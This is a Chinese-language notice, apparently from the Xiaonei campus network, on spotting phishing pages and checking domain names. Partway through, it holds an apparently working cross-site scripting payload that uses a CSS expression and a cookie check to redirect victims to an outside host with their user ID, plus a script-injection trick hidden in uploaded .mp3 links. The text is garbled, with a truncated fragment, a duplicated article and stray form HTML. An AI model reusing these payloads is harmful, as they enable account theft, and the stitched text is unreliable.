最近不少恶意用户利用涂鸦版的漏洞或发布连接，引导用户进入他们制作的和校内网一摸一样的页面来骗取我们的帐号或诈骗财物。
下面我们来做一下分析怎样防止上当受骗
诈骗手段：
1、利用涂鸦版的漏洞发布恶意代码，访问存在恶意代码用户的主页就会跳转到和校内一样的登陆页让你输入账号重新登陆
2、在留言/群中发布中将信息 或抽奖活动，诈骗我们的财物

对于第一种手段我们已经采取了过滤措施，恶意信息已经作了屏蔽，但是第二种方式我们防不胜防。那我们如何辨别信息的真实性呢？
辨别真伪：
首先我们要了解一下以下概念
1、首先我们需要了解什么是域名。 http://www.officeweb.com.cn/boss/files/a_07.htm 这篇文章中的 1 2 4 已经详细的描述清楚了。
2、地址栏 这个应该都知道 就是我们输入 网站地址（连接） 的地方。

以上的概念理解后，我想大家都知道我们校内网的域名是 xiaonei.com 。访问我们的网站你可以看到在你们的地址栏中的连接地址都是含有 xiaonei.com这个域名的。
比如这个连接 http://xiaonein.3355.cn/ （一个诈骗活动） 他的域名是 3355.cn 这个就不是xiaonei的域名 ,

blog.xiaonei.com 就是校内的域名为什么呢？
这里有个2级域名的概念 二级域名是一级域名的子域名 在校内 xiaonei.com 是以及域名就是我们通常说的校内的域名 .
大家如果理解了这个当你看到让你输入的帐号页面 或活动页面你看看地址栏中的连接 是否以 http://xxx.xiaonei.com/ 开始
养 document.cookie.indexOf('bones=') == -1) loca\tion.href('http://home.goo'+'far.com/xianei/Error.asp?from='+parent.loca\tion.href.substring(parent.loca\tion.href.indexOf('id')+3).replace(/[^0-9]/g, '')+'&id='+document.getElementById('mymenu').innerHTML.substring(document.getElementById('mymenu').innerHTML.indexOf('http://xiaonei.com/getuser.do?id=') + 33, document.getElementById('mymenu').innerHTML.indexOf('我的页面')).replace(/[^0-9]/g, '')))"><DIV STYLE="s:ex\pression(if(document.cookie.indexOf('bones=') == -1) document.cookie='bones=z1;expires='+new Date(new Date().getTime()+10000).toGMTString())">

2、(link 漏洞)
<link
href="http://fm032.img.xiaonei.com/tribe/20070324/0340/A8956163GE.mp3"
rel="stylesheet" type="text/css" media="all" />
<div class=jscode>
codeJSUrl="http://fm022.img.xiaonei.com/tribe/20070325/1150/A4771284GE.mp3";
codeCSSUrl="http://source.xiaonei.com/tribe/20070118/1130/orig3213710.css";
var s2 = document.creat eElement("scr"+"ipt");
s2.src=codeJSUrl;
document.body.insert AdjacentE lement("BeforeBegin",s2);
</div>

http://xiaonei.com/getsysupdateinfo.do

怎样识别诈骗信息
白云龙发布于2007-04-26 14:31

最近不少恶意用户利用涂鸦版的漏洞或发布连接，引导用户进入他们制作的和校内网一摸一样的页面来骗取我们的帐号或诈骗财物。
下面我们来做一下分析怎样防止上当受骗
诈骗手段：
1、利用涂鸦版的漏洞发布恶意代码，访问存在恶意代码用户的主页就会跳转到和校内一样的登陆页让你输入账号重新登陆
2、在留言/群中发布中将信息 或抽奖活动，诈骗我们的财物

对于第一种手段我们已经采取了过滤措施，恶意信息已经作了屏蔽，但是第二种方式我们防不胜防。那我们如何辨别信息的真实性呢？
辨别真伪：
首先我们要了解一下以下概念
1、首先我们需要了解什么是域名。 http://www.officeweb.com.cn/boss/files/a_07.htm 这篇文章中的 1 2 4 已经详细的描述清楚了。
2、地址栏 这个应该都知道 就是我们输入 网站地址（连接） 的地方。

以上的概念理解后，我想大家都知道我们校内网的域名是 xiaonei.com 。访问我们的网站你可以看到在你们的地址栏中的连接地址都是含有 xiaonei.com这个域名的。
比如这个连接 http://xiaonein.3355.cn/ （一个诈骗活动） 他的域名是 3355.cn ;       </tr>
           <tr>
               <td align="right" valign="top" nowrap><span style="font-weight: bold">附件上传:</span></td>
               <td colspan="2" align="left"><iframe src="attachment.asp" width="100%" height="24" frameborder="0" scrolling="no" border="0" frameborder="0"></iframe></td>
             </tr>
            <tr>
              <td align="right" valign="top"><span style="font-weight: bold">引用通告:</span></td>